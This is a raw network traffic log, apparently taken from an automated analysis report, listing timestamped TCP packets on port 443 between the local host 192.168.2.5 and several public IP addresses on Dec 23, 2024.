                                                Dec 23, 2024 15:21:27.769865990 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.769877911 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.782463074 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.782491922 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.782557964 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.782574892 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.786631107 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.786694050 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.786706924 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.786758900 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.790829897 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.795408964 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.795469046 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.795479059 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.795526981 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.803302050 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.803311110 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.803385973 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.812016964 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.812102079 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.819897890 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.819961071 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.824706078 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.824770927 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.833375931 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.833478928 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.833489895 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.833506107 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.833537102 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.833594084 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.833759069 CET49763443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.833776951 CET44349763104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.896363020 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.896397114 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.896464109 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.896632910 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.896684885 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.896742105 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.906177044 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.906193018 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.906316042 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.906337976 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.910389900 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.910432100 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.910522938 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.910684109 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:27.910706997 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:27.964396954 CET44349761135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.964484930 CET44349761135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:27.964682102 CET49761443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.979744911 CET49761443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:27.979796886 CET44349761135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:28.061548948 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:28.061599016 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:28.061675072 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:28.061852932 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:28.061882019 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:28.061945915 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:28.062063932 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:28.062081099 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:28.062192917 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:28.062206030 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:28.196470022 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:28.196516037 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:28.196598053 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:28.196846008 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:28.196862936 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:29.120385885 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.120695114 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.120724916 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.121752024 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.121828079 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.122183084 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.122247934 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.122315884 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.122325897 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.170290947 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.276015043 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.276324034 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.276346922 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.277404070 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.277528048 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.285795927 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.285901070 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.285990000 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.286005974 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.328478098 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.328783989 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.328800917 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.329829931 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.329900026 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.330213070 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.330271006 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.330337048 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.330348015 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.338423014 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.338989973 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.339195013 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.339210033 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.340240955 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.340349913 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.340713978 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.340781927 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.340820074 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.372169018 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.383322954 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.383434057 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.383440971 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.433818102 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.480335951 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.481930971 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.481959105 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.483058929 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.483140945 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.483573914 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.483663082 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.483728886 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.483736992 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:29.526057959 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:29.627048969 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627098083 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627125978 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627165079 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627206087 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627211094 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.627254963 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.627269983 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.627305031 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.627321005 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.635746002 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.635854006 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.635868073 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.644160986 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.644223928 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.644237995 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.684796095 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.684811115 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.719933987 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.720015049 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.720073938 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.720779896 CET49773443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:29.720801115 CET44349773104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:29.731477976 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.771584988 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:29.825243950 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:29.960207939 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011193991 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011240959 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011279106 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011321068 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011374950 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011409998 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011425972 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011441946 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011452913 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011516094 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011521101 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011540890 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011569977 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011601925 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011607885 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011610985 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011622906 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011627913 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011641979 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011656046 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011656046 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011665106 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011673927 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.011683941 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011693954 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011712074 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011717081 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011717081 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.011732101 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011735916 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011739969 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011749983 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.011751890 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011802912 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011817932 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.011820078 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.011821032 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.011828899 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.011857986 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.011884928 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.012303114 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.015393019 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.015578985 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.015597105 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.019373894 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.025602102 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.025620937 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.026278019 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:30.026316881 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:30.026392937 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:30.026541948 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:30.026552916 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:30.026596069 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:30.026782036 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:30.026796103 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:30.026818037 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.026885033 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.026982069 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:30.026995897 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:30.060251951 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.079935074 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.083708048 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.083786964 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.083808899 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.107372046 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.107578039 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.107878923 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.107892990 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.123310089 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.123375893 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.123395920 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.135396957 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.135409117 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.135472059 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.135490894 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.150444031 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.151642084 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.151676893 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.151829958 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.151829958 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.151846886 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.164350986 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.164446115 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.164463043 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.164505959 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.177751064 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.177826881 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.191529989 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.191622019 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.197913885 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.197999954 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.211355925 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.211435080 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.224195004 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.224287987 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.237025976 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.237128019 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.243379116 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.243486881 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.255127907 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.255203962 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.261385918 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.261442900 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.273777962 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.273865938 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.286220074 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.286295891 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.298418045 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.298501968 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.304315090 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.304384947 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.314857006 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.314919949 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.314939022 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.314955950 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.315000057 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.315520048 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.316581964 CET49770443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.316621065 CET44349770135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.317385912 CET49769443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.317404985 CET44349769135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.320864916 CET49771443192.168.2.5104.17.24.14
                                                Dec 23, 2024 15:21:30.320883989 CET44349771104.17.24.14192.168.2.5
                                                Dec 23, 2024 15:21:30.335571051 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.335609913 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.335671902 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.335875034 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.335889101 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.412658930 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.412744999 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.412807941 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.413495064 CET49772443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:30.413507938 CET44349772135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:30.986864090 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.987052917 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.987138033 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.987811089 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.987839937 CET4434977413.227.8.64192.168.2.5
                                                Dec 23, 2024 15:21:30.987854004 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:30.987900972 CET49774443192.168.2.513.227.8.64
                                                Dec 23, 2024 15:21:31.241657972 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.242054939 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.242074966 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.243587971 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.243695974 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.244136095 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.244229078 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.244278908 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.288271904 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.288285971 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.328072071 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.559642076 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.559988976 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.560019016 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.561137915 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.561249971 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.562330008 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.562400103 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.562500954 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.562510014 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.614415884 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.689116001 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.689227104 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.689327955 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.690169096 CET49780443192.168.2.5104.26.12.205
                                                Dec 23, 2024 15:21:31.690226078 CET44349780104.26.12.205192.168.2.5
                                                Dec 23, 2024 15:21:31.767152071 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:31.767528057 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:31.767560959 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:31.767911911 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:31.768230915 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:31.768328905 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:31.768373013 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:31.811346054 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:31.813761950 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:31.990180969 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.990360022 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:31.990612030 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.992207050 CET49781443192.168.2.5172.67.69.226
                                                Dec 23, 2024 15:21:31.992228031 CET44349781172.67.69.226192.168.2.5
                                                Dec 23, 2024 15:21:32.144663095 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:32.144712925 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:32.144772053 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:32.145052910 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:32.145068884 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:32.308293104 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:32.308325052 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:32.308396101 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:32.308458090 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.308491945 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.310338020 CET49782443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.310374975 CET44349782135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:32.313709974 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.313759089 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:32.313829899 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.314064980 CET49790443192.168.2.5135.225.111.190
                                                Dec 23, 2024 15:21:32.314080000 CET44349790135.225.111.190192.168.2.5
                                                Dec 23, 2024 15:21:33.670871019 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:33.671214104 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:33.671235085 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:33.672308922 CET44349789104.26.9.44192.168.2.5
                                                Dec 23, 2024 15:21:33.672373056 CET49789443192.168.2.5104.26.9.44
                                                Dec 23, 2024 15:21:33.672794104 CET49789443192.168.2.5104.26.9.44
